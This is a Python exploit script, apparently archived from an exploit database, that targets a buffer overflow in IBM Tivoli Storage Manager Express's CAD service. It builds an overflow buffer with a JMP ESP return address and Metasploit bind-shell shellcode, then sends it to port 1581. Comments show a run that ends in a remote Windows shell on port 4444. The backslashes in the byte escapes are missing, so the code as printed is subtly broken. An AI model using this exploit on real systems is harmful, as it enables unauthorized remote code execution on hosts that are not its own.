#!/usr/bin/python
#
# IBM Tivoli Storage Manager Express CAD Service Buffer Overflow (5.3)
# http://www.zerodayinitiative.com/advisories/ZDI-07-054.html
# Tested on windows 2003 server SP0. 
# Coded by Mati Aharoni
# muts.at.offensive-security.com
# http://www.offensive-security.com/0day/dsmcad.py.txt
#
# bt ~ # ./dsmcad.py 192.168.1.107
# [*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
# [*] http://www.offensive-security.com
# [*] Connecting to 192.168.1.107
# [*] Sending evil buffer, ph33r
# [*] Check port 4444 for bindshell
#
# bt ~ # nc -v 192.168.1.107 4444
# 192.168.1.107: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.107] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# E:Program FilesTivoliTSMbaclient>

import socket
import sys

print "[*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow"
print "[*] http://www.offensive-security.com"

def usage():
	print "[*] Usage: ./dsmcad.py <host>"
	sys.exit(1)

if len(sys.argv) != 2:
	usage()

buffer="BirdsflyinghighyouknowhowIfeel"
buffer+="SunintheskyyouknowhowIfeel"
buffer+="ReeedsdriftinonbyyouknowhowIfeel"
buffer+="ItsanewdawnItsanewdayItsanewlifeForme"
buffer+="ItsanewdawnItsanewdayItsanewlifeFormeitsanewdawnitsanewdayforme"

buffer+="x38x07xD2x77"	#77D20738 - FFE4 JMP ESP User32.dll Win2kSp0 EN
buffer+="x90"*4
buffer+=(
# win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x37x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax61"
"x58x50x30x41x31x42x41x6bx41x41x71x41x32x41x41x32"
"x42x41x30x42x41x58x50x38x41x42x75x68x69x49x6cx31"
"x7ax68x6bx62x6dx49x78x4bx49x39x6fx6bx4fx39x6fx33"
"x50x4ex6bx52x4cx34x64x74x64x6ex6bx42x65x67x4cx6c"
"x4bx41x6cx46x65x42x58x57x71x7ax4fx6cx4bx50x4fx65"
"x48x4ex6bx71x4fx51x30x37x71x58x6bx77x39x4ex6bx75"
"x64x4cx4bx53x31x5ax4ex44x71x4bx70x6fx69x6ex4cx6c"
"x44x69x50x42x54x45x57x4fx31x7ax6ax36x6dx54x41x6b"
"x72x78x6bx69x64x47x4bx50x54x36x44x64x68x43x45x4a"
"x45x6ex6bx41x4fx56x44x65x51x48x6bx75x36x6cx4bx64"
"x4cx50x4bx6ex6bx71x4fx77x6cx34x41x48x6bx53x33x66"
"x4cx6ex6bx4bx39x30x6cx36x44x65x4cx51x71x4fx33x57"
"x41x39x4bx71x74x4cx4bx50x43x76x50x4ex6bx41x50x54"
"x4cx6ex6bx32x50x45x4cx4cx6dx6ex6bx47x30x36x68x73"
"x6ex32x48x6cx4ex30x4ex56x6ex5ax4cx56x30x6bx4fx4b"
"x66x71x76x62x73x31x76x45x38x74x73x76x52x71x78x63"
"x47x63x43x76x52x31x4fx41x44x79x6fx4ex30x65x38x58"
"x4bx48x6dx4bx4cx75x6bx72x70x6bx4fx7ax76x71x4fx6f"
"x79x6dx35x51x76x6cx41x58x6dx65x58x57x72x73x65x73"
"x5ax44x42x49x6fx6ex30x31x78x4ex39x64x49x6ax55x4e"
"x4dx53x67x79x6fx6ex36x41x43x31x43x46x33x73x63x42"
"x73x30x43x41x43x32x63x70x53x4bx4fx38x50x43x56x71"
"x78x74x51x33x6cx31x76x70x53x4ex69x5ax41x4dx45x41"
"x78x4cx64x35x4ax30x70x6bx77x52x77x6bx4fx6ex36x62"
"x4ax34x50x72x71x76x35x69x6fx4ex30x45x38x6ex44x4c"
"x6dx46x4ex4dx39x46x37x59x6fx4bx66x30x53x62x75x49"
"x6fx38x50x63x58x6bx55x37x39x4ex66x71x59x41x47x6b"
"x4fx5ax76x70x50x51x44x31x44x70x55x6bx4fx68x50x6e"
"x73x71x78x59x77x70x79x5ax66x71x69x66x37x6bx4fx6a"
"x76x52x75x4bx4fx5ax70x71x76x31x7ax55x34x31x76x72"
"x48x50x63x72x4dx6fx79x78x65x53x5ax72x70x72x79x76"
"x49x78x4cx4bx39x4dx37x53x5ax32x64x6dx59x6ax42x37"
"x41x6bx70x4bx43x4fx5ax49x6ex63x72x56x4dx49x6ex30"
"x42x64x6cx6dx43x6cx4dx62x5ax75x68x6cx6bx6ex4bx6e"
"x4bx50x68x43x42x49x6ex6cx73x62x36x69x6fx74x35x30"
"x44x6bx4fx48x56x53x6bx70x57x73x62x71x41x70x51x76"
"x31x63x5ax57x71x42x71x66x31x72x75x71x41x49x6fx68"
"x50x75x38x4cx6dx79x49x74x45x5ax6ex32x73x4bx4fx6e"
"x36x72x4ax6bx4fx6bx4fx50x37x79x6fx4ex30x6ex6bx46"
"x37x69x6cx4fx73x69x54x52x44x49x6fx4bx66x43x62x6b"
"x4fx5ax70x51x78x7ax50x4fx7ax76x64x31x4fx33x63x4b"
"x4fx48x56x49x6fx48x50x61")
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
print "[*] Connecting to "+sys.argv[1]
expl.connect ( ( sys.argv[1], 1581 ) )
print "[*] Sending evil buffer, ph33r"
expl.send ( 'GET /BACLIENT HTTP/1.0rnHost: 192.168.1.1 '+ buffer+'rnrn')
expl.close()
print "[*] Check port 4444 for bindshell"

# www.Syue.com [2007-10-27]